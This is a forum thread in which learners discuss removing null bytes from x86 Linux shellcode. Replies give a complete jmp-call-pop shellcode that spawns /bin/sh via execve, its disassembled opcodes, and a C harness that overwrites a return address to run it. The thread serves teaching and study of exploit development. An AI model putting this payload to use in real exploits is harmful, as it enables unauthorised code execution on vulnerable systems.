understanding for rid null bytes from my code ???

Viewing 15 reply threads
  • Author
    • #3090

      Hi all,
      i have a question about shellcode that  i learn:
        * i had create some c file and i had compiled it to exe but  when i
          use “objdump -d file.c” i saw there is a null bytes on my code so i had compile that c file to assembler
        file using gcc but when i got the assembler files i always failed to rid that null bytes from my assembler
        code that i just compile, here is the assembler code that i don’t had modified:

        .file  "shell.c"
              .section        .rodata
              .string "/bin/sh"
      .globl main
              .type  main, @function
              leal    4(%esp), %ecx
              andl    $-16, %esp
              pushl  -4(%ecx)
              pushl  %ebp
              movl    %esp, %ebp
              pushl  %ecx
              subl    $36, %esp
              movl    $.LC0, -12(%ebp)
              movl    $0, -8(%ebp)
              movl    -12(%ebp), %edx
              movl    $0, 8(%esp)
              leal    -12(%ebp), %eax
              movl    %eax, 4(%esp)
              movl    %edx, (%esp)
              call    execve
              movl    $0, (%esp)
              call    exit
              .size  main, .-main
              .ident  "GCC: (GNU) 4.1.2 20061115 (prerelease) (SUSE Linux)"
              .section        .note.GNU-stack,"",@progbits

      Thanks a lot before and sorry for this stupid question(still noob about asm  :-[ ),

      Thank you,  🙂

    • #20880

      I’m not an asm programmer, but there is a very good description of this problem in  the book Sockets, Shellcode, Porting and Coding by James C. Foster. Not much help if you don’t have the book I know, but it’s a good resource for learning to write shellcode.


    • #20881


      I haven’t spent much time playing with custom shellcode yet so this may not work. However, first thing I’d look at is msfencode from the Metasploit framework, I think you should be able to run your compiled shellcode through this with a list of bad characters to remove null bytes and any other character that would break functionality.

      Hopefully you can either prove or disprove this theory, or someone with more experience can provide further guidance, good luck.


    • #20882

      Hi Nubie – I’m also new at writing shellcode, but it is my understanding that you should look at the actual opcodes to determine where the null byte is coming from.

      Use objdump -d on the compiled file and identify which commands have null bytes – for example:

      80483a5:      b8 11 00 00 00          mov    $0x11,%eax

      Has three null bytes, but you can fix this by changing to use the low 8 bit register:
      mov $0x11, %al

      Which will remove the null bytes from the shellcode but still perform the same function.

      Does this assist at all?

    • #20883

      NickFnord’s answer is correct. I checked my book 😉 Putting arbitrary values into the extended registers like eax leads to null byte padding. For example…

      mov eax,1


      movl eax,0x00000001

      This is because the eax register is 4 bytes wide, so when you move a value into it it must be 4 bytes in length. The way to load a value into this register is to use the 8-bit version al.

      mov al,1

      Set the register to zero before doing this by xoring the 32-bit register with itself…

      xor eax,eax


    • #20884

      Hi all,

      Thanks a lot for all your replies and sorry just post this reply now, cause
      i had a problem internet connection( :'( in my country it’s so difficult to find a good and cheap provider). And about code above that i’ had compiled theoritically
      i had understand that but why/or it is true when i compiled same code in different pc with different operating systems the results i’ve compiled had different cause i had use suse and cygwin for compiled that code to assembly code and the result seem different although if i read carefully the null byte is different ???.
      And i still try to rid that null in different OS like that cause i want to full understanding about this matter ;D. Thank’s a lot again for your kind help
      and sorry for this post  🙂

    • #20885

      don’t say sorry for posting!  there’s no such thing as a stupid question.

      yes, your code may compile differently under different operating systems and definately with different compilers, but it should all by syntactically the same.

      the general process for writing shellcode goes:

      1. write your code in a high level language
      2. compile to assembly
      3. take only the assembly component that you need from it
      4. compile cut-down assembly to binary
      5. disassemble resulting binary to identify null bytes
      6. re-work the assembly until you remove null bytes (see above posts for general idea of how to remove null bytes).

      you may need to engage in some jiggery-pokery to reserve space for strings such as /bin/sh etc.

      if you’re serious about getting into this, I Highly recommend getting “the shellcoders handbook” – the entire book is dedicated to writing shellcode.

      I’ll post an excerpt from it detailing the above steps later on if you like (don’t have the book in front of me right now).

    • #20886

      Thank you NickFnord for your support and your help  :),
      and i’m really like/glad if you want to help me.

      nubie  🙂

    • #20887

      Hi all,
      What i want to asking is about in line 16 in my code that i posted about %.LC0 when i search about LC0 it just about symbol/label for an address and i see using objdump the address is
      0x8048500 and it contain one part NULL, i need some help/advices for rid that part of NULL from that address ?.
      And also is my think is true based on this replies post, about if that just contain full NULL like ex:
          mov ebx, 0 (in shellcode it contain full NULL)
          so the change is: xor ebx, ebx
      And how about is write movl $0,(%esp)(like my code in below, it showed)
      is just the change just like : xor %esp,(%esp)

      Thank you, but sorry if my language is confusing :-[,


    • #20888

      Hi again,

      I was going to try to type out an excerpt from the shellcoder’s handbook, but it is multiple pages long.  This was a Good Thing because it forced me to understand it prior to posting here 🙂  I havn’t done so previously because I’m focusing on the reversing course that I’m doing at the moment.

      Anyway, In summary:

      We want to spawn a shell by calling

      execve ('/bin/sh','/bin/sh',null);

      So first we write what we want to do in c (this is code from the book): 

      int main()
        char *happy[2];
        happy[0] = "/bin/sh";
        happy[1] = null;
        execve (happy[0],happy,null);

      Next we disassemble it and take a look at the execve call (this is cut down to show the parameters and the call itself, but it’s good to look at the entire function):

        804e15b:      8b 5d 08                mov    0x8(%ebp),%ebx
        804e165:      8b 4d 0c                mov    0xc(%ebp),%ecx
        804e168:      8b 55 10                mov    0x10(%ebp),%edx
        804e16b:      b8 0b 00 00 00          mov    $0xb,%eax
        804e170:      cd 80                  int    $0x80

      As you can see, int 80 performs the syscall which is stored in eax (execve is 0xb)  and takes three arguments, passed in via the registers ebx, ecx and edx (fastcall convention). 

      The problem with simply taking the disassembly and removing null bytes is that there are a lot of hard-coded addresses in there – which, as you’ve found, are difficult to deal with.

      So we need a way to make it so we can reference everything via relative addressing.

      The simplest way to do this is to have our shellcode execute in it’s own stack frame that we can control.  The idea is that we start the shellcode off with a call and then go from there.

      Here’s the assembly code from the book (sorry for the intel syntax):

      Section .text

        global _start


        jmp short gotocall


        pop esi
        xor eax, eax
        mov byte [esi+7], al
        lea ebx, [esi]
        mov long [esi +8], ebx
        mov long [esi + 12], eax
        mov byte al, 0x0b
        mov ebx, esi
        lea ecx, [esi + 8]
        lea edx, [esi +12]
        int 0x80


        call shellcode
        db '/bin/shABBBBCCCC'

      When the call instruction is executed, the instruction immediately following is placed on the stack.  We’ve included some padding in the db (define byte) instruction in order to make room for the extra parameters in our call to execve.

      Next we pop esi to get the address of our ‘/bin/shABBBBCCCC’ string into the ESI register – now we can reference this as offsets from ESI.

      xor eax, eax

      sets eax to null.

      mov byte [esi+7], al

      places a null over the 7th byte in our string the “A”

      lea ebx, [esi]

      places our string into ebx

      mov long [esi +8], ebx

      moves our string into the address at esi+8.  our string now should look like: ‘/bin/sh./bin/shCCCC’  with the “.” representing a null

      mov long [esi + 12], eax

      This moves null (eax was xor’d previously) into the last part of our string

      Now we set up ready for the interrupt 80:

      mov byte al, 0x0b
      mov ebx, esi
      lea ecx, [esi + 8]
      lea edx, [esi +12]

      At this point – EAX will contain 00 00 00 0b
      EBX will contain a pointer to the string ‘/bin/sh’
      Ecx will also contain a pointer to the string ‘/bin/sh’
      And edx will contain a pointer to a null

      Then we execute the interrupt.

      int 0x80

      So you merely have to compile that assembly and extract the opcodes.

      hope that helps –

    • #20889

      Hi NickFnord,

      thanks for the tutorial above, but from that that tutorial it makes me think/choose for
      create a true code without NULL by using pure assembly code or fixing NULL bytes later
      when code has set up  ???, actually both of it i must still learn but i just ask some opinion
      about this.

      Thank’s a lot . 🙂


    • #20890

      I’m by no means an expert, just learning, like yourself so I may be very wrong, (please someone stop me if I am!) but I’m almost certain that for the most part when writing shellcode yourself you’re not going to be  able to simply manipulate the existing assembly to remove the nulls, you’re going to have to analyse the code that you’re wanting to execute and break it down into its essential components and then re-write as efficiently as you can.

      Even when you do a simple exit as below:

      > vi exitcode.c
      void main()

      > gcc -static -o exitcode exitcode.c

      > objdump -d ./exitcode > exitcode.dump

      0804e12c :
      804e12c:      8b 5c 24 04            mov    0x4(%esp),%ebx
      804e130:      b8 fc 00 00 00          mov    $0xfc,%eax
      804e135:      cd 80                  int    $0x80
      804e137:      b8 01 00 00 00          mov    $0x1,%eax
      804e13c:      cd 80                  int    $0x80

      you’re still going to have to figure out what is being loaded into ebx (0 apparently).

      and determine whether you need both int 80’s. (one is exit_group() and one is exit())

      The resulting assembly would be

      section .text

        global _start

        xor ebx, ebx
        xor eax, eax
        mov al, 1
        int 80

      which doesn’t really bear a lot of resemblence to the original disassembly 

    • #20891

      Hi NickFnord,

      Thanks for your opinion and it makes me realizes and comfort about writing shellcode  :).

      Thanks again for your help  ;D.


    • #20892

      nubie, have u tried that asm code NickFnord posted on reply #9? been trying to run it but it keeps segfaulting on me. NickFnord, any thoughts? m running ubuntu 8.10, also tried on debian 4 and fedora 10 but i got the same result, if that matters.

    • #20893

      the idea is that you compile the asm, objdump it, extract the opcodes and then test it in a C program. 

      bt shellcode # objdump -d ./shell

      ./shell:     file format elf32-i386

      Disassembly of section .text:

      08048060 :
      8048060:       eb 1a                   jmp    804807c

      08048062 :
      8048062:       5e                      pop    %esi
      8048063:       31 c0                   xor    %eax,%eax
      8048065:       88 46 07                mov    %al,0x7(%esi)
      8048068:       8d 1e                   lea    (%esi),%ebx
      804806a:       89 5e 08                mov    %ebx,0x8(%esi)
      804806d:       89 46 0c                mov    %eax,0xc(%esi)
      8048070:       b0 0b                   mov    $0xb,%al
      8048072:       89 f3                   mov    %esi,%ebx
      8048074:       8d 4e 08                lea    0x8(%esi),%ecx
      8048077:       8d 56 0c                lea    0xc(%esi),%edx
      804807a:       cd 80                   int    $0x80

      0804807c :
      804807c:       e8 e1 ff ff ff          call   8048062
      8048081:       2f                      das
      8048082:       62 69 6e                bound  %ebp,0x6e(%ecx)
      8048085:       2f                      das
      8048086:       73 68                   jae    80480f0
      8048088:       41                      inc    %ecx
      8048089:       42                      inc    %edx
      804808a:       42                      inc    %edx
      804808b:       42                      inc    %edx
      804808c:       42                      inc    %edx
      804808d:       43                      inc    %ebx
      804808e:       43                      inc    %ebx
      804808f:       43                      inc    %ebx
      8048090:       43                      inc    %ebx

      take the opcodes and stick into a test framework:

      char shellcode[] =
      int main()
      int *ret;
      ret = (int *)&ret + 2;
      (*ret) = (int)shellcode;

      and that should run fine.

      edit:  here’s a good article I found helpful too:


    • #20894

      thanks for the reply NickFnord. the article is a good read too.

Viewing 15 reply threads
  • You must be logged in to reply to this topic.

Copyright ©2021 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.


Sign in with Caendra

Forgot password?Sign up

Forgot your details?